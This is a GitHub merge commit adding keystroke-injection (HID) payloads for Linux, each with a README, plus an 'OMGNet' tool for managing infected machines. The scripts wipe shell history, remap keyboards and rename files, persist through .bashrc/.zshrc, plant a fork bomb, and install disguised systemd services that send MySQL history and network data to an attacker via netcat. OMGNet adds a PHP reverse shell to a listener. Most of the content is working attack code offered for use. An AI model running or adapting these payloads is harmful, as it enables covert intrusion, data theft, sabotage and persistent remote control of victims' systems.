Merge pull request #190 from drapl0n/master

uploading payloads and module payloads.
pull/216/head
Kalani Helekunihi 2023-12-07 13:29:41 -05:00 committed by GitHub
commit b6916df78e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
21 changed files with 648 additions and 0 deletions

View File

@ -0,0 +1,19 @@
## About
# Title: capslock_disable
# Description: capslock_disable disables capslock on target's system.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux.
# Attackmodes: HID.
## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
### Workflow:
1. Executing Terminal Emulator.
2. Prevent storing history.
3. Executing command which disables capslock.
4. Terminating terminal instance.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,16 @@
REM Title: capslock_disable
REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 200
STRING setxkbmap -option ctrl:nocaps && exit
ENTER

View File

@ -0,0 +1,24 @@
## About:
# Title: browser_execOMG
# Description: browser_execOMG finds browser installed in target's system and searche URL in it.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution.
# Target: Unix-like operating systems.
# Attackmodes: HID
## browser_execOMG: A payload which finds installed browser in target's system and searches URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
### Workflow:
1. Executing Terminal Emulator.
2. Prevent storing history.
3. Storing script in target's system.
4. Granting execution privilege.
5. Executing script in background.
### Usage:
* Replace URL at line `15` in `payload.txt` with URL you want to search for.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,22 @@
REM Title: browser_execOMG
REM Description: browser_execOMG finds browser installed in target's system and searche URL in it.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: Unix-like operating systems.
REM Attackmodes: HID
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING echo -e "url=hak5.org \n#\!/bin/bash\nfunction browser(){\n\tbrowser=\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \"\$browser\" = firefox ]; then\n\t\texecBrowser=\$(echo \$browser --private-window)\n\t\texport execBrowser\n\telif [ \"\$browser\" = chromium ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telif [ \"\$browser\" = brave ]; then\n\t\texecBrowser=\$(echo \$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \"Browser not found.\"\n\tfi\n}\nbrowser\n\$execBrowser \$url " > /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys & disown && exit
ENTER

View File

@ -0,0 +1,27 @@
## About:
* Title: keyboard_hangover
* Description: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution.
* Target: Unix-like operating systems.
* Attackmodes: HID.
## keyboard_hangover: keyboard_hangover is a powerful oneliner payload which randomly remaps target's keyboard and and auto-triggers it.
### Features:
1. Randomly remaps keyboard.
2. Auto-Triggers on shell execution.
3. Persistent payload.
4. Fast execution.
5. Oneliner.
### Workflow:
1. Prevent storing history.
2. Creating random string generation mechanism.
3. Creating loop to find files.
4. Granting executing privileges.
5. Executing Payload Script.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,22 @@
REM Title: keyboard_hangover
REM Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard..
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: Unix-like operating systems.
REM Attackmodes: HID
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\n\nmapping_file=\"/var/tmp/system\"\n\nkeycodes=(\$(seq 8 255))\ncharacters=(\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n \${#keycodes[@]}))\n\nmapping_content=""\nfor((i=0; i<\${#keycodes[@]}; i++)); do\n\tkeycode=\${keycodes[i]}\n\tchar=\${characters[i]}\n\tmapping_content+=\"keycode \$keycode = \$char\\\n\"\ndone\n\necho -e \$mapping_content > \$mapping_file\n\nls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.zshrc\nfi\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"xmodmap /var/tmp/system\" >> ~/.bashrc\nfi" > /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys && rm /tmp/sys && exit
ENTER

View File

@ -0,0 +1,24 @@
## About:
* Title: rename_entropy
* Description: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution.
* Target: Unix-like operating systems.
* Attackmodes: HID.
## rename_entropy: rename_entropy is a powerful payload which renames target files along with extensions in home directory.
### Features:
1. Renames files and directories.
2. Fast paylaod execution.
3. Oneliner Payload.
### Workflow:
1. Prevent storing history.
2. Creating random string generation mechanism.
3. Granting executing privileges.
4. Executing Payload Script.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,22 @@
REM Title: rename_entropy
REM Description: rename_entropy, rename_entropy is a powerful payload which renames target files with extensions.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING echo -e "#\!/bin/bash\ndir=\"/home/\$(whoami)/testdir/\"\ncd \"\$dir\" || exit\nfor file in *; do\n\trand_str=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1)\n\trand_ext=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1)\n\tmv \"\$file\" \"\${rand_str}.\${rand_ext}\"\ndone" > /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys && rm /tmp/sys && exit
ENTER

View File

@ -0,0 +1,23 @@
## About:
# Title: SHELL_TRIGGER
# Description: SHELL_TRIGGER is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution.
# Target: Unix-like operating systems.
# Attackmodes: HID
## SHELL_TRIGGER: SHELL_TRIGGER is payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
### Workflow:
1. Executing Terminal Emulator.
2. Prevent storing history.
3. Storing script in target's system.
4. Granting execution privilege.
5. Executing script in background.
### Changes to be made:
* Replace command on line `15` in `payload.txt` with command/script you want your target to execute on shell execution.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,25 @@
REM Title: shell_trigger
REM Description: shell_trigger is an payload which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: Unix-like operating systems.
REM Attackmodes: HID
DELAY 1000
CTRL ALT t
DELAY 500
STRING unset HISTFILE
ENTER
DELAY 100
STRING cmd="echo hello world"
ENTER
DELAY 200
STRING echo -e "ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"$cmd\" >> ~/.bashrc\nfi" >> /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys && rm /tmp/sys && exit
ENTER

View File

@ -0,0 +1,25 @@
## About:
* Title: swap_jack
* Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on target's system.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Execution.
* Target: Unix-like operating systems.
* Attackmodes: HID, Storage.
## swap_jack: Simple yet Powerful payload which can be used to replace one command with another on target's system. swap_jack gives your target capability to trigger backdoors for you.
### Features:
1. Swap commands/Execute scripts covertly.
2. Persistent.
3. Can swap multiple commands.
4. Makes your target run commands/script for you.
### Usage:
* To swap custom commands make following changes at line `18` in `payload.sh`:
* Default swaped commands: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"'`.
* Example: Swapping `pwd` command with `find`:
* Add entry seperated by `\\n` to the line `18`: `swap_array='alias ls=\"du\" \\n alias cd=\"dh\" \\n alias cat=\"lsblk\"' \\n alias pwd=\"find\"`
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,28 @@
REM Title: swap_jack
REM Description: swap_jack, simple yet powerful payload which can be used to replace one command with another on targets system.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Execution.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 1900
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\n" > /tmp/sys
ENTER
DELAY 200
STRING echo -e "swap_array='alias ls=\"du\" \\nalias cd=\"df\" \\nalias cat=\"lsblk\"'" >> /tmp/sys
ENTER
DELAY 200
STRING echo -e "\n\n\ls -a ~/ | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.zshrc\nfi\n\nls -a ~/ | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"\$swap_array\" >> ~/.bashrc\nfi" >> /tmp/sys
ENTER
DELAY 200
STRING chmod +x /tmp/sys
ENTER
DELAY 200
STRING /tmp/./sys && rm /tmp/sys && exit
ENTER

View File

@ -0,0 +1,43 @@
REM Title: termBomb
REM Description: termBomb prompts message "!!!!!!YOU HAVE BEEN HACKED!!!!!!" and executes fork bomb on launching shell/terminal.
REM Author: drapl0n
REM Version: 1.0
REM Category: Execution
REM Target: Unix-like operating systems.
REM Attackmode: HID
DELAY 400
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
STRING cat <<EOF > /tmp/tmppp
ENTER
STRING ls -a | grep 'zshrc' &> /dev/null
ENTER
STRING if [ 0 = 0 ]; then
ENTER
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.zshrc
ENTER
STRING echo ":(){ :|:& };:" >> ~/.zshrc
ENTER
STRING fi
ENTER
ENTER
STRING ls -a | grep 'bashrc' &> /dev/null
ENTER
STRING if [ 0 = 0 ]; then
ENTER
STRING echo -e "echo -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"\necho -e \""'!!!!!!YOU HAVE BEEN HACKED!!!!!!"'"" >> ~/.bashrc
ENTER
STRING echo ":(){ :|:& };:" >> ~/.bashrc
ENTER
STRING fi
ENTER
STRING EOF
ENTER
DELAY 300
STRING chmod +x /tmp/tmppp && /tmp/./tmppp && rm /tmp/tmppp
ENTER
STRING exit
ENTER

View File

@ -0,0 +1,33 @@
## About:
* Title: mysql_dump
* Description: mysql_dump, a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltaration
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## mysql_dump: mysql_dump payload exfiltrates MySQL history, which can be used to understand targets database schema.
### Features:
* Exfiltrates mysql_history.
* Fully Persistent.
* Waits for target to get online.
* Transfers loot once target is online.
* Oneliner payload.
### Workflow:
1. Search if mysql_history file is present.
2. Creating Loot transfer mechanism in targets system.
3. Creating local systemd service for persistence.
4. Executing Autotart mechanism.
### Usage:
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
2. Example: `nc -lvp 4444 > mysql_history.txt
### Changes to be made:
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,22 @@
REM Title: mysql_dump
REM Description: mysql_dump, is a oneliner payload used to exfiltrate mysql history. Looting mysql history can be useful understanding targets database schema.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Exfiltaration.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 2000
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\nls -a ~/ | grep -w '.mysql_history' &> /dev/null\nif [ \$? = 0 ]; then\n\tmkdir -p ~/.config/systemd/user\n\tmkdir -p /var/tmp/.system\n\tcp ~/.mysql_history /tmp/exfil\n\techo -e \"while :\\\ndo\\\n\\\tping -c 5 8.8.8.8\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\n\tchmod +x /var/tmp/.system/systemBus\n\techo -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\n\tsystemctl --user enable --now systemBUS.service\n\tsystemctl --user start --now systemBUS.service\n\techo -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\n\tchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp \nfi" > /tmp/system
ENTER
DELAY 200
STRING chmod +x /tmp/system
ENTER
DELAY 200
STRING /tmp/./system && rm /tmp/system && exit
ENTER

View File

@ -0,0 +1,33 @@
## About:
* Title: network_surveillance
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltaration
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
### Features:
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* Fully Persistent.
* Waits for target to get online.
* Transfers loot once target is online.
* Oneliner payload.
### Workflow:
1. Extracts network information.
2. Creating Loot transfer mechanism in targets system.
3. Creating local systemd service for persistence.
4. Executing Autotart mechanism.
### Usage:
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
2. Example: `nc -lvp 4444 > network_surveillance.txt
### Changes to be made:
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,22 @@
REM Title: network_surveillance
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Exfiltration.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 1000
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
ENTER
DELAY 200
STRING chmod +x /tmp/system
ENTER
DELAY 200
STRING /tmp/./system && rm /tmp/system && exit
ENTER

View File

@ -0,0 +1,135 @@
#!/bin/bash
allowAbort=true;
myInterruptHandler()
{
if $allowAbort; then
echo
echo -e "\n\033[1mYou terminated OMGNetManager...\033[0m" && exit 1;
fi;
}
trap myInterruptHandler SIGINT;
echo -e "\033[4m\033[1mWelcome to OMGNet Manager!!!\033[0m"
echo
echo -e "1] Connect with target.\n2] Create new target.\n3] List available target.\n4] Remove target.\n5] Update target."
echo
read -p "Enter your choice: " ch
create () {
read -p "Enter Target's name(without whitespaces): " name
if [[ $(grep -oh "\w*$name\w*" ~/.config/OMGNet/OMGNet.db) == $name ]]; then
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mName \"$name\" already exists."
exit 1
fi
read -p "Enter Servers IP: " ip
read -p "Enter Unique Port Number(1500-65535): " port
if [[ $(grep -oh "\w*$ip\w*" ~/.config/OMGNet/OMGNet.db) == $ip ]] && [[ $(grep -oh "\w*$port\w*" ~/.config/OMGNet/OMGNet.db) == $port ]]; then
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mTarget exist with similar IP address \"$ip\" and port number \"$port\"."
exit 1
fi
max=65535
min=1500
read -p "Specify directory for output: " dir
if [ ! -d "$dir" ]; then
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$dir\" no such directory."
exit 1
else
cp -r ~/.config/OMGNet/payload $dir
fi
if [[ $ip =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && (( $port <= $max )) && (( $port >= $min )); then
sed -i -e "s/0.0.0.0/$ip/g" $dir/payload
sed -i -e "s/4444/$port/g" $dir/payload
echo -e "$(echo "$name"|xargs)\t$ip\t$port" >> ~/.config/OMGNet/OMGNet.db
read -p "Do you want payload encoded(y|n): " enc
else
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$ip\" or Port number \"$port\"."
exit 1
fi
}
list () {
column -t -o ' ' ~/.config/OMGNet/OMGNet.db | awk '{print NR" - "$0}'
}
remove () {
echo
list
echo
read -p "Enter name of target to remove: " rmv
if grep -q $rmv ~/.config/OMGNet/OMGNet.db; then
sed -i "/\b\($rmv\)\b/d" ~/.config/OMGNet/OMGNet.db
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mRemoved \"$rmv\"."
else
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0m\"$rmv\" no such target found."
fi
}
update () {
echo
list
echo
read -p "Choose target number: " cho
read -p "You want to update (ip|port): " ent
if [ "$ent" = ip ]
then
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
read -p "Enter new ip: " use
if [[ $use =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
sed -i -e "$cho s/$one/$use/g" ~/.config/OMGNet/OMGNet.db
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated IP."
else
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid IP address \"$use\"."
exit
fi
elif [ "$ent" = port ]
then
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
read -p "Enter new Port number: " useP
max=65535
min=1500
if (( $useP <= $max )) && (( $useP >= $min )); then
sed -i -e "$cho s/$two/$useP/g" ~/.config/OMGNet/OMGNet.db
echo -e "\033[0;32m\e[1mOMGNetManager:Success:\e[0mUpdated Port number\"$ent\"."
else
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid Port Number \"$useP\"."
fi
else
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e0m[Invalid choice \"$ent\"."
fi
}
connect () {
echo
list
echo
read -p "Enter Target number to connect: " cho
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
read -p "Do you want to listen on local address(y|n): " src
if [ "$src" = n ]
then
echo -e "Listning on IP address \"$one\" and Port number \"$two\"...."
nc -lv -s $one -p $two
elif [ "$src" = y ]
then
echo -e "Listning on Port number \"$two\"...."
nc -nvlp $two
else
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid choice \"$src\"."
fi
}
if [ "$ch" = 1 ]
then
connect
elif [ "$ch" = 2 ]
then
create
elif [ "$ch" = 3 ]
then
list
elif [ "$ch" = 4 ]
then
remove
elif [ "$ch" = 5 ]
then
update
else
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid choice \"$ch\"."
fi

View File

@ -0,0 +1,28 @@
# OMGNet
## About:
* Title: OMGNet
* Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID
## OMGNet is cluster of systems infected with persistentReverseOMG which are manged by OMGNetManager.
### Functions:
* Connect to target.
* Create new target.
* List targets.
* Remove target.
* Update target.
### Installation:
Use ``install.sh`` script to install OMGNetManager.
### Usage:
Use command ``OMGNetManager``.
#### Support me if you like my work:
* https://twitter.com/drapl0n

View File

@ -0,0 +1,5 @@
mkdir ~/.config/OMGNet
mv payload ~/.config/OMGNet/
touch ~/.config/OMGNet/OMGNet.db
chmod +x OMGNetManager
sudo mv OMGNetManager /bin/

View File

@ -0,0 +1,50 @@
REM Title: OMGNet
REM Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Remote Access
REM Target: Unix-like operating systems with systemd.
REM Attackmodes: HID
REM [keeping tracks clear]
DELAY 500
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE
ENTER
DELAY 100
REM [creating reverse shell]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating non-root systemd service]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 100
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
STRING systemctl --user enable --now systemBUS.service
ENTER
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 100
REM [autostarting service on terminal/shell launch]
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
ENTER
DELAY 50
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER